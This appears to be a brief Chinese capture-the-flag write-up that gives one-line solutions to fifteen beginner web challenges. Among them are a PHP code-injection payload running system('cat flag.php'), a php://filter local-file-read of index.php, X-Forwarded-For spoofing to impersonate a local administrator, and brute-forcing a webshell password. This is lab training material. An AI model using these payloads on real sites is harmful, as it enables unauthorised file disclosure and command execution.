0x01 web1
payload:F12
0x02 web2
payload:F12->Elements->右键修改为maxlength="2"
0x03 web3
payload:http://114.67.246.176:12552/?what=flag
0x04 web4
payload:以post方式传参
0x05 web5
payload:?num=1a
0x06 web6
站长工具中Unicode转ASCII
f;
0x01 web7
抓包,重复发送,有一个就是flag
0x01 web8
payload:"".system('cat flag.php')
0x01 web9
$GLOBALS的作用是:引用全局作用域中可用的全部变量,变量的名字就是数组的键。
var_dump()函数 显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。
payload:?args=GLOBALS
0x0A web10
抓包看响应头
0x0B web11
扫描得shell.php,爆破密码为hack
0x0C web12
源代码中有base64,解密得密码,用户名为admin,发送请求时加上X-Forwarded-For:127.0.0.1【本地管理员】
0x0D web13
查看源代码发现js代码,改eval为alert,执行后复制弹出的代码,观察可得复制if中的值到框中即可拿flag
0x0Eweb14
payload:file=php://filter/read=convert.base64-encode/resource=index.php
base64解码即可
0x0F web15
5位数爆破,12468